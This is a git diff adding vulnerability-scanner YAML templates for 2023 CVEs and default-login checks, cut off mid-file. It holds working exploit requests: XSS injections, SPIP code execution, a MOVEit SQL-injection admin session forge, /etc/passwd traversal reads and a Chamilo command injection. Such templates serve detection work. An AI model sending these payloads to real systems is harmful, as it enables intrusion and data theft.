https://github.com/10splayaSec/CVE-Disclosures/tree/main/ChurchCRM/CVE-2023-26843 + - https://nvd.nist.gov/vuln/detail/CVE-2023-26843 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2023-26843 + cwe-id: CWE-79 + metadata: + max-request: 2 + verified: true + tags: cve,cve2023,churchcrm,stored,xss,authenticated + +http: + - raw: + - | + POST /session/begin HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + User={{username}}&Password={{password}} + + - | + POST /NoteEditor.php?FamilyID=1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + PersonID=0&FamilyID=1&NoteID=&NoteText=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&Submit=Save + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "><img src=x onerror=alert(document.domain)>")' + - 'contains(body_2, "ChurchCRM")' + condition: and diff --git a/http/cves/2023/CVE-2023-27372.yaml b/http/cves/2023/CVE-2023-27372.yaml new file mode 100644 index 0000000000..0a5166faf7 --- /dev/null +++ b/http/cves/2023/CVE-2023-27372.yaml @@ -0,0 +1,63 @@ +id: CVE-2023-27372 + +info: + name: SPIP - Remote Command Execution + author: DhiyaneshDK,nuts7 + severity: critical + description: | + SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1. + reference: + - https://packetstormsecurity.com/files/171921/SPIP-Remote-Command-Execution.html + - https://nvd.nist.gov/vuln/detail/CVE-2023-27372 + - https://github.com/nuts7/CVE-2023-27372 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-27372 + metadata: + max-request: 2 + shodan-query: html:"spip.php?page=backend" + verified: "true" + tags: cve,cve2023,spip,rce + +http: + - raw: + - | + GET /spip.php?page=spip_pass HTTP/1.1 + Host: {{Hostname}} + + - | + POST /spip.php?page=spip_pass HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + page=spip_pass&formulaire_action=oubli&formulaire_action_args={{csrf}}&oubli=s:19:"<?php phpinfo(); ?>"; + + matchers-condition: and + matchers: + - type: word + part: body_2 + words: + - "PHP Extension" + - "PHP Version" + - "<!DOCTYPE html" + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + name: csrf + group: 1 + internal: true + part: body_1 + regex: + - "name='formulaire_action_args'[^>]*value='([^']*)'" + + - type: regex + part: body_2 + group: 1 + regex: + - '>PHP Version <\/td><td class="v">([0-9.]+)' diff --git a/http/cves/2023/CVE-2023-31548.yaml b/http/cves/2023/CVE-2023-31548.yaml new file mode 100644 index 0000000000..0cae8c42fa --- /dev/null +++ b/http/cves/2023/CVE-2023-31548.yaml @@ -0,0 +1,47 @@ +id: CVE-2023-31548 + +info: + name: ChurchCRM v4.5.3 - Cross-Site Scripting + author: Harsh + severity: medium + description: | + A stored Cross-site scripting (XSS) vulnerability in the FundRaiserEditor.php component of ChurchCRM v4.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. + reference: + - https://github.com/10splayaSec/CVE-Disclosures/tree/main/ChurchCRM/CVE-2023-31548 + - https://nvd.nist.gov/vuln/detail/CVE-2023-31548 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2023-31548 + cwe-id: CWE-79 + metadata: + max-request: 2 + verified: true + tags: cve,cve2023,churchcrm,stored,xss,authenticated + +http: + - raw: + - | + POST /session/begin HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + User={{username}}&Password={{password}} + + - | + POST /FundRaiserEditor.php?linkBack=&FundRaiserID=-1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + FundRaiserSubmit=Save&Date=2023-06-24&Title=%22+onfocus%3D%22alert%28document.domain%29%22+autofocus%3D%22&Description=test + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "onfocus=\"alert(document.domain)\" autofocus=\"\"></td>")' + - 'contains(body_2, "ChurchCRM")' + condition: and diff --git a/http/cves/2023/CVE-2023-32315.yaml b/http/cves/2023/CVE-2023-32315.yaml index 58c11e6478..37e40a8e1d 100644 --- a/http/cves/2023/CVE-2023-32315.yaml +++ b/http/cves/2023/CVE-2023-32315.yaml @@ -1,7 +1,7 @@ id: CVE-2023-32315 info: - name: Administration Console Authentication Bypass in Openfire Console + name: Openfire Administration Console - Authentication Bypass author: vsh00t severity: high description: | diff --git a/http/cves/2023/CVE-2023-33510.yaml b/http/cves/2023/CVE-2023-33510.yaml new file mode 100644 index 0000000000..42bacca23c --- /dev/null +++ b/http/cves/2023/CVE-2023-33510.yaml @@ -0,0 +1,38 @@ +id: CVE-2023-33510 + +info: + name: Jeecg P3 Biz Chat - Local File Inclusion + author: DhiyaneshDK + severity: high + description: | + Jeecg P3 Biz Chat 1.0.5 allows remote attackers to read arbitrary files through specific parameters. + reference: + - https://twitter.com/momika233/status/1670701256535572481 + - https://carl1l.github.io/2023/05/08/jeecg-p3-biz-chat-1-0-5-jar-has-arbitrary-file-read-vulnerability/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33510 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-33510 + cwe-id: CWE-668 + metadata: + max-request: 1 + verified: "true" + shodan-query: http.favicon.hash:1380908726 + tags: cve,cve2023,jeecg,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/chat/imController/showOrDownByurl.do?dbPath=../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-33568.yaml b/http/cves/2023/CVE-2023-33568.yaml new file mode 100644 index 0000000000..075ce4d536 --- /dev/null +++ b/http/cves/2023/CVE-2023-33568.yaml @@ -0,0 +1,34 @@ +id: CVE-2023-33568 + +info: + name: Dolibarr Unauthenticated Contacts Database Theft + author: DhiyaneshDK + severity: high + description: | + An issue in Dolibarr 16 before 16.0.5 allows unauthenticated attackers to perform a database dump and access a company's entire customer file, prospects, suppliers, and employee information if a contact file exists. + reference: + - https://www.dsecbypass.com/en/dolibarr-pre-auth-contact-database-dump/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-33568 + metadata: + max-request: 1 + verified: "true" + shodan-query: http.favicon.hash:440258421 + tags: cve,cve2023,dolibarr,unauth + +http: + - method: GET + path: + - "{{BaseURL}}/public/ticket/ajax/ajax.php?action=getContacts&email=%" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"database_name":' + - '"database_user":' + condition: and + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-34362.yaml b/http/cves/2023/CVE-2023-34362.yaml new file mode 100644 index 0000000000..213166fb4c --- /dev/null +++ b/http/cves/2023/CVE-2023-34362.yaml @@ -0,0 +1,126 @@ +id: CVE-2023-34362 + +info: + name: MOVEit Transfer - Remote Code Execution + author: princechaddha,rootxharsh,ritikchaddha,pdresearch + severity: critical + description: | + In Progress MOVEit Transfer before 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.4 (14.0.4), 2022.1.5 (14.1.5), and 2023.0.1 (15.0.1), a SQL injection vulnerability has been found in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain access to MOVEit Transfer's database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker may be able to infer information about the structure and contents of the database, and execute SQL statements that alter or delete database elements. NOTE: this is exploited in the wild in May and June 2023; exploitation of unpatched systems can occur via HTTP or HTTPS. All versions (e.g., 2020.0 and 2019x) before the five explicitly mentioned versions are affected, including older unsupported versions. + reference: | + - https://github.com/horizon3ai/CVE-2023-34362 + - https://www.horizon3.ai/moveit-transfer-cve-2023-34362-deep-dive-and-indicators-of-compromise/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-34362 + classification: + cve-id: CVE-2023-34362 + metadata: + max-request: 7 + shodan-query: http.favicon.hash:989289239 + verified: true + tags: cve,cve2023,moveit,rce,sqli,intrusive + +variables: + sessioncookie: "{{randstr}}" + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + User-Agent: python-requests/2.26.0 + Cookie: siLockLongTermInstID=0 + + - | + POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1 + Host: {{Hostname}} + Ax-silock-transaction: folder_add_by_path + X-siLock-Transaction: session_setvars + X-siLock-SessVar0: MyUsername: Guest + X-siLock-SessVar1: MyPkgAccessCode: 123 + X-siLock-SessVar2: MyGuestEmailAddr: my_guest_email@example.com + Cookie: siLockLongTermInstID=0 + + - | + POST /guestaccess.aspx HTTP/1.1 + Host: {{Hostname}} + User-Agent: python-requests/2.26.0 + Accept-Encoding: gzip, deflate + Cookie: siLockLongTermInstID=0 + Accept: */* + Content-Type: application/x-www-form-urlencoded + + Arg06=123 + + - | + @Host: https://checkip.amazonaws.com + GET / HTTP/1.1 + Host: checkip.amazonaws.com + + - | + POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1 + Host: {{Hostname}} + User-Agent: python-requests/2.26.0 + Accept-Encoding: gzip, deflate + Accept: */* + Ax-silock-transaction: folder_add_by_path + X-siLock-Transaction: session_setvars + X-siLock-SessVar0: MyPkgID: 0 + X-siLock-SessVar1: MyPkgSelfProvisionedRecips: SQL Injection'); INSERT INTO activesessions (SessionID) values ('{{sessioncookie}}');UPDATE activesessions SET Username=(select Username from users order by permission desc limit 1) WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET LoginName='test@test.com' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET RealName='test@test.com' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET InstId='1234' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET IpAddress='{{ips}}' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET LastTouch='2099-06-10 09:30:00' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET DMZInterface='10' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET Timeout='60' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET ResilNode='10' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET AcctReady='1' WHERE SessionID='{{sessioncookie}}'; -- asdf + Cookie: siLockLongTermInstID=0 + Content-Length: 0 + + - | + POST /guestaccess.aspx HTTP/1.1 + Host: {{Hostname}} + Cookie: siLockLongTermInstID=0 + Content-Type: application/x-www-form-urlencoded + + CsrfToken={{csrf}}&transaction=secmsgpost&Arg01=email_subject&Arg04=email_body&Arg06=123&Arg05=send&Arg08=email%40example.com&Arg09=attachment_list + + - | + POST /api/v1/auth/token HTTP/1.1 + Host: {{Hostname}} + User-Agent: python-requests/2.26.0 + Accept-Encoding: gzip, deflate + Cookie: ASP.NET_SessionId={{sessioncookie}} + Content-Type: application/x-www-form-urlencoded + + grant_type=session&username=x&password=x + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body_7 + words: + - '{"access_token":' + + - type: word + part: header_7 + words: + - application/json + + - type: status + status: + - 200 + + extractors: + - type: regex + internal: true + name: ips + regex: + - '\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b' + + - type: regex + name: csrf + part: body + group: 1 + regex: + - 'name="csrftoken" value="(\w+)">' + internal: true + + - type: regex + name: access_token + part: body + group: 1 + regex: + - '"access_token":"([^"]+)"' diff --git a/http/cves/2023/CVE-2023-34598.yaml b/http/cves/2023/CVE-2023-34598.yaml new file mode 100644 index 0000000000..29ce5517b1 --- /dev/null +++ b/http/cves/2023/CVE-2023-34598.yaml @@ -0,0 +1,37 @@ +id: CVE-2023-34598 + +info: + name: Gibbon v25.0.0 - Local File Inclusion + author: DhiyaneshDk + severity: high + description: | + Gibbon v25.0.0 is vulnerable to a Local File Inclusion (LFI) vulnerability where it's possible to include the content of several files present in the installation folder in the server's response. + reference: + - https://github.com/maddsec/CVE-2023-34598 + - https://twitter.com/shaybt12/status/1673612503547355137?s=20 + - https://nvd.nist.gov/vuln/detail/CVE-2023-34598 + classification: + cve-id: CVE-2023-34598 + metadata: + max-request: 1 + verified: true + shodan-query: http.favicon.hash:-165631681 + fofa-query: icon_hash="-165631681" + tags: cve,cve2023,gibbon,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/?q=./gibbon.sql" + + matchers-condition: and + matchers: + - type: word + words: + - "phpMyAdmin SQL Dump" + - "gibbon" + condition: and + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-34599.yaml b/http/cves/2023/CVE-2023-34599.yaml new file mode 100644 index 0000000000..12067aa1d8 --- /dev/null +++ b/http/cves/2023/CVE-2023-34599.yaml @@ -0,0 +1,73 @@ +id: CVE-2023-34599 + +info: + name: Gibbon v25.0.0 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + Multiple Cross-Site Scripting (XSS) vulnerabilities have been identified in Gibbon v25.0.0, which enable attackers to execute arbitrary Javascript code. + reference: + - https://github.com/maddsec/CVE-2023-34599 + - https://vulmon.com/searchpage?q=CVE-2023-34599 + classification: + cve-id: CVE-2023-34599 + metadata: + max-request: 2 + shodan-query: http.favicon.hash:-165631681 + tags: cve,cve2023,gibbon,xss,authenticated + +http: + - raw: + - | + POST /login.php? HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8m88nqhR1NAnQEYZ + + ------WebKitFormBoundary8m88nqhR1NAnQEYZ + Content-Disposition: form-data; name="address" + + + ------WebKitFormBoundary8m88nqhR1NAnQEYZ + Content-Disposition: form-data; name="method" + + default + ------WebKitFormBoundary8m88nqhR1NAnQEYZ + Content-Disposition: form-data; name="username" + + {{username}} + ------WebKitFormBoundary8m88nqhR1NAnQEYZ + Content-Disposition: form-data; name="password" + + {{password}} + ------WebKitFormBoundary8m88nqhR1NAnQEYZ + Content-Disposition: form-data; name="gibbonSchoolYearID" + + 017 + ------WebKitFormBoundary8m88nqhR1NAnQEYZ + Content-Disposition: form-data; name="gibboni18nID" + + 0001 + ------WebKitFormBoundary8m88nqhR1NAnQEYZ-- + + - | + GET /index.php?q=/modules/Staff/staff_view_details.php&gibbonTTID=00000010&gibbonPersonID=0000000001&search=yyraq'><script>alert(document.domain)</script>oq7c8fmwwro&ttDate=05/23/2023&schoolCalendar=N&personalCalendar=N&spaceBookingCalendar=N&fromTT=Y HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body_2 + words: + - '><script>alert(document.domain)</script>' + - 'gibbon' + condition: and + case-insensitive: true + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-34843.yaml b/http/cves/2023/CVE-2023-34843.yaml new file mode 100644 index 0000000000..357f5ba31d --- /dev/null +++ b/http/cves/2023/CVE-2023-34843.yaml @@ -0,0 +1,36 @@ +id: CVE-2023-34843 + +info: + name: Traggo Server - Local File Inclusion + author: DhiyaneshDk + severity: high + description: | + traggo/server version 0.3.0 is vulnerable to directory traversal. + reference: + - https://github.com/rootd4ddy/CVE-2023-34843 + metadata: + max-request: 1 + verified: true + shodan-query: html:"traggo" + tags: cve,cve2023,traggo,lfi,server + +http: + - method: GET + path: + - "{{BaseURL}}/static/..%5c..%5c..%5c..%5cetc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0" + + - type: word + words: + - text/plain + part: header + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-34960.yaml b/http/cves/2023/CVE-2023-34960.yaml new file mode 100644 index 0000000000..893544036b --- /dev/null +++ b/http/cves/2023/CVE-2023-34960.yaml @@ -0,0 +1,40 @@ +id: CVE-2023-34960 + +info: + name: Chamilo Command Injection + author: DhiyaneshDK + severity: high + reference: + - https://sploitus.com/exploit?id=FD666992-20E1-5D83-BA13-67ED38E1B83D + - https://github.com/Aituglo/CVE-2023-34960/blob/master/poc.py + metadata: + max-request: 1 + verified: "true" + shodan-query: http.component:"Chamilo" + tags: cve,cve2023,chamilo + +http: + - raw: + - | + POST /main/webservices/additional_webservices.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml; charset=utf-8 + + <?xml version="1.0" encoding="UTF-8"?> + <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{{RootURL}}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type="ns2:Map"><item><key xsi:type="xsd:string">file_data</key><value xsi:type="xsd:string"></value></item><item><key xsi:type="xsd:string">file_name</key><value xsi:type="xsd:string">`{}`.pptx'|" |cat /etc/passwd||a #</value></item><item><key xsi:type="xsd:string">service_ppt2lp_size</key><value xsi:type="xsd:string">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope> + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + part: body + + - type: word + part: header + words: + - text/xml + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-35843.yaml b/http/cves/2023/CVE-2023-35843.yaml new file mode 100644 index 0000000000..2dc42d0d11 --- /dev/null +++ b/http/cves/2023/CVE-2023-35843.yaml @@ -0,0 +1,31 @@ +id: CVE-2023-35843 + +info: + name: NocoDB version <= 0.106.1 - Arbitrary File Read + author: dwisiswant0 + severity: high + description: | + NocoDB through 0.106.1 has a path traversal vulnerability that allows an unauthenticated attacker to access arbitrary files on the server by manipulating the path parameter of the /download route. This vulnerability could allow an attacker to access sensitive files and data on the server, including configuration files, source code, and other sensitive information. + reference: + - https://advisory.dw1.io/60 + - https://nvd.nist.gov/vuln/detail/CVE-2023-35843 + metadata: + max-request: 1 + verified: true + shodan-query: http.favicon.hash:-2017596142 + tags: cve,cve2023,nocodb,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/download/{{repeat('..%2F', 5)}}etc%2Fpasswd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-35844.yaml b/http/cves/2023/CVE-2023-35844.yaml new file mode 100644 index 0000000000..4bc2c0c108 --- /dev/null +++ b/http/cves/2023/CVE-2023-35844.yaml @@ -0,0 +1,34 @@ +id: CVE-2023-35844 + +info: + name: Lightdash version <= 0.510.3 Arbitrary File Read + author: dwisiswant0 + severity: high + description: | + packages/backend/src/routers in Lightdash before 0.510.3 + has insecure file endpoints, e.g., they allow .. directory + traversal and do not ensure that an intended file extension + (.csv or .png) is used. + reference: + - https://advisory.dw1.io/59 + - https://nvd.nist.gov/vuln/detail/CVE-2023-35844 + metadata: + max-request: 1 + shodan-query: title:"Lightdash" + verified: true + tags: cve,cve2023,lightdash,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/api/v1/slack/image/slack-image{{repeat('%2F..', 3)}}%2Fetc%2Fpasswd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/http/default-logins/apache/airflow-default-login.yaml b/http/default-logins/apache/airflow-default-login.yaml index 94d7209ea7..52ee07a94e 100644 --- a/http/default-logins/apache/airflow-default-login.yaml +++ b/http/default-logins/apache/airflow-default-login.yaml @@ -54,7 +54,7 @@ http: - type: dsl dsl: - 'contains(body_1, "Sign In - Airflow")' - - 'contains(all_headers_2, "session=.")' + - 'contains(header_2, "session=.")' - 'status_code_2 == 302' condition: and diff --git a/http/default-logins/apollo/apollo-default-login.yaml b/http/default-logins/apollo/apollo-default-login.yaml index e30307ffbc..4616e0a6f2 100644 --- a/http/default-logins/apollo/apollo-default-login.yaml +++ b/http/default-logins/apollo/apollo-default-login.yaml @@ -52,7 +52,7 @@ http: - type: dsl dsl: - "status_code_1 == 302 && status_code_2 == 200" - - "contains(tolower(all_headers_2), 'application/json')" + - "contains(tolower(header_2), 'application/json')" condition: and # Enhanced by mp on 2022/03/22 diff --git a/http/default-logins/cobbler/hue-default-credential.yaml b/http/default-logins/cobbler/hue-default-credential.yaml index d740dccea0..0dd7750c95 100644 --- a/http/default-logins/cobbler/hue-default-credential.yaml +++ b/http/default-logins/cobbler/hue-default-credential.yaml @@ -60,8 +60,8 @@ http: - type: dsl dsl: - contains(tolower(body_1), 'welcome to hue') - - contains(tolower(all_headers_2), 'csrftoken=') - - contains(tolower(all_headers_2), 'sessionid=') + - contains(tolower(header_2), 'csrftoken=') + - contains(tolower(header_2), 'sessionid=') condition: and - type: status diff --git a/http/default-logins/flir/flir-default-login.yaml b/http/default-logins/flir/flir-default-login.yaml index 257bb98094..8e9f7ae627 100644 --- a/http/default-logins/flir/flir-default-login.yaml +++ b/http/default-logins/flir/flir-default-login.yaml @@ -39,9 +39,9 @@ http: - type: dsl dsl: - - contains(tolower(all_headers), 'text/html') - - contains(tolower(all_headers), 'phpsessid') - - contains(tolower(all_headers), 'showcameraid') + - contains(tolower(header), 'text/html') + - contains(tolower(header), 'phpsessid') + - contains(tolower(header), 'showcameraid') condition: and diff --git a/http/default-logins/gophish/gophish-default-login.yaml b/http/default-logins/gophish/gophish-default-login.yaml index a0304f7a28..9055710d18 100644 --- a/http/default-logins/gophish/gophish-default-login.yaml +++ b/http/default-logins/gophish/gophish-default-login.yaml @@ -48,9 +48,9 @@ http: matchers: - type: dsl dsl: - - "!contains(tolower(all_headers), 'location: /login')" - - "contains(tolower(all_headers), 'location: /')" - - "contains(tolower(all_headers), 'gophish')" + - "!contains(tolower(header), 'location: /login')" + - "contains(tolower(header), 'location: /')" + - "contains(tolower(header), 'gophish')" - "status_code==302" condition: and diff --git a/http/default-logins/jupyterhub/jupyterhub-default-login.yaml b/http/default-logins/jupyterhub/jupyterhub-default-login.yaml index 79b53d382d..8a7a26c537 100644 --- a/http/default-logins/jupyterhub/jupyterhub-default-login.yaml +++ b/http/default-logins/jupyterhub/jupyterhub-default-login.yaml @@ -38,8 +38,8 @@ http: matchers: - type: dsl dsl: - - contains(tolower(all_headers), 'jupyterhub-session-id=') - - contains(tolower(all_headers), 'jupyterhub-hub-login=') + - contains(tolower(header), 'jupyterhub-session-id=') + - contains(tolower(header), 'jupyterhub-hub-login=') condition: and - type: status diff --git a/http/default-logins/mantisbt/mantisbt-default-credential.yaml b/http/default-logins/mantisbt/mantisbt-default-credential.yaml index 56c3cdce5a..05c926d00d 100644 --- a/http/default-logins/mantisbt/mantisbt-default-credential.yaml +++ b/http/default-logins/mantisbt/mantisbt-default-credential.yaml @@ -36,8 +36,8 @@ http: matchers: - type: dsl dsl: - - contains(tolower(all_headers), 'mantis_secure_session') - - contains(tolower(all_headers), 'mantis_string_cookie') + - contains(tolower(header), 'mantis_secure_session') + - contains(tolower(header), 'mantis_string_cookie') condition: and - type: status diff --git a/http/default-logins/nsicg/nsicg-default-login.yaml b/http/default-logins/nsicg/nsicg-default-login.yaml index a3e6f3fd3e..6a4b9f1a95 100644 --- a/http/default-logins/nsicg/nsicg-default-login.yaml +++ b/http/default-logins/nsicg/nsicg-default-login.yaml @@ -46,7 +46,7 @@ http: matchers: - type: dsl dsl: - - 'contains(all_headers_1, "/user/main/")' + - 'contains(header_1, "/user/main/")' - 'status_code_1 == 302' - 'status_code_2 == 200' - contains(body_2, "var loguser = \'ns25000") diff --git a/http/default-logins/phpmyadmin/phpmyadmin-default-login.yaml b/http/default-logins/phpmyadmin/phpmyadmin-default-login.yaml index 5225fd0798..00b3331d65 100644 --- a/http/default-logins/phpmyadmin/phpmyadmin-default-login.yaml +++ b/http/default-logins/phpmyadmin/phpmyadmin-default-login.yaml @@ -71,9 +71,9 @@ http: matchers: - type: dsl dsl: - - contains(all_headers_2, "phpMyAdmin=") && contains(all_headers_2, "pmaUser-1=") + - contains(header_2, "phpMyAdmin=") && contains(header_2, "pmaUser-1=") - status_code_2 == 302 - - contains(all_headers_2, 'index.php?collation_connection=utf8mb4_unicode_ci') || contains(all_headers_2, '/index.php?route=/&route=%2F') + - contains(header_2, 'index.php?collation_connection=utf8mb4_unicode_ci') || contains(header_2, '/index.php?route=/&route=%2F') condition: and # Enhanced by md on 2023/01/09 diff --git a/http/default-logins/riello/netman-default-login.yaml b/http/default-logins/riello/netman-default-login.yaml new file mode 100644 index 0000000000..97ace980bf --- /dev/null +++ b/http/default-logins/riello/netman-default-login.yaml @@ -0,0 +1,42 @@ +id: netman-default-login + +info: + name: Riello UPS NetMan 204 Network Card - Default Login + author: mabdullah22 + severity: high + description: | + Default logins on Riello UPS NetMan 204 is used. Attacker can access to UPS and attacker can manipulate the UPS settings to disrupt the onsite systems. + reference: + - https://www.riello-ups.com/ + metadata: + verified: "true" + shodan-query: title:"Netman" + censys-query: services.http.response.body:"Netman204" + max-request: 1 + tags: default-login,netman + +http: + - raw: + - | + GET /cgi-bin/login.cgi?username={{username}}&password={{password}} HTTP/1.1 + Host: {{Hostname}} + + attack: pitchfork + payloads: + username: + - admin + password: + - admin + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"response": "ok",' + - '"message": "Welcome."' + condition: and + + - type: status + status: + - 200 diff --git a/http/default-logins/sequoiadb/sequoiadb-default-login.yaml b/http/default-logins/sequoiadb/sequoiadb-default-login.yaml index f7438fb261..7de32e99e6 100644 --- a/http/default-logins/sequoiadb/sequoiadb-default-login.yaml +++ b/http/default-logins/sequoiadb/sequoiadb-default-login.yaml @@ -43,7 +43,7 @@ http: - type: dsl dsl: - - contains(tolower(all_headers), 'sdbsessionid') + - contains(tolower(header), 'sdbsessionid') - type: word part: body diff --git a/http/default-logins/versa/versa-default-login.yaml b/http/default-logins/versa/versa-default-login.yaml index 0fa8b006a3..5284e230da 100644 --- a/http/default-logins/versa/versa-default-login.yaml +++ b/http/default-logins/versa/versa-default-login.yaml @@ -43,14 +43,14 @@ http: - type: dsl dsl: - 'status_code_2 == 302' - - "contains(tolower(all_headers_2), 'jsessionid')" - - "contains(tolower(all_headers_2), 'location: /versa/index.html')" + - "contains(tolower(header_2), 'jsessionid')" + - "contains(tolower(header_2), 'location: /versa/index.html')" condition: and - type: dsl dsl: - - "contains(tolower(all_headers_2), '/login?error=true')" - - "contains(tolower(all_headers_2), '/login?tokenmissingerror=true')" + - "contains(tolower(header_2), '/login?error=true')" + - "contains(tolower(header_2), '/login?tokenmissingerror=true')" negative: true # Enhanced by mp on 2022/04/06 diff --git a/http/exposed-panels/arcgis/arcgis-rest-api.yaml b/http/exposed-panels/arcgis/arcgis-rest-api.yaml index d5855b0c0a..9f0ff3df13 100644 --- a/http/exposed-panels/arcgis/arcgis-rest-api.yaml +++ b/http/exposed-panels/arcgis/arcgis-rest-api.yaml @@ -1,10 +1,10 @@ id: arcgis-rest-api info: - name: ArcGIS Exposed Docs + name: ArcGIS Exposed REST API documentation author: Podalirius severity: info - description: ArcGIS documents were discovered. + description: ArcGIS REST API documentation was discovered. reference: - https://enterprise.arcgis.com/en/ classification: diff --git a/http/exposed-panels/atlassian-crowd-panel.yaml b/http/exposed-panels/atlassian-crowd-panel.yaml index 9ff7221536..10eeb1b28d 100644 --- a/http/exposed-panels/atlassian-crowd-panel.yaml +++ b/http/exposed-panels/atlassian-crowd-panel.yaml @@ -2,7 +2,7 @@ id: atlassian-crowd-panel info: name: Atlassian Crowd Login Panel - author: organiccrap + author: organiccrap,AdamCrosser severity: info description: An Atlassian Crowd login panel was discovered. reference: @@ -12,6 +12,9 @@ info: tags: panel,atlassian metadata: max-request: 1 + vendor: atlassian + product: crowd + category: sso http: - method: GET @@ -24,4 +27,10 @@ http: - <title>Atlassian Crowd - Login part: body -# Enhanced by mp on 2022/03/20 + extractors: + - type: regex + name: version + group: 1 + regex: + - 'value="Version: ([\d.]+)' + part: body diff --git a/http/exposed-panels/aws-ec2-autoscale.yaml b/http/exposed-panels/aws-ec2-autoscale.yaml new file mode 100644 index 0000000000..d1b61492b9 --- /dev/null +++ b/http/exposed-panels/aws-ec2-autoscale.yaml @@ -0,0 +1,31 @@ +id: aws-ec2-autoscale + +info: + name: AWS EC2 Auto Scaling Lab + author: DhiyaneshDk + severity: info + reference: + - https://www.facebook.com/photo/?fbid=620605120110011&set=a.467014098802448 + metadata: + max-request: 1 + verified: true + shodan-query: html:"AWS EC2 Auto Scaling Lab" + tags: exposure,ec2,aws,amazon + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'AWS EC2 Auto Scaling Lab' + - 'EC2 Instance Metadata' + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/exposed-panels/axxon-client-panel.yaml b/http/exposed-panels/axxon-client-panel.yaml new file mode 100644 index 0000000000..d5d42063a0 --- /dev/null +++ b/http/exposed-panels/axxon-client-panel.yaml @@ -0,0 +1,33 @@ +id: axxon-client-panel + +info: + name: Axxon Next Client Login - Detect + author: irshadahamed + severity: info + description: Axxon One is a limitlessly scalable video management software + reference: + - 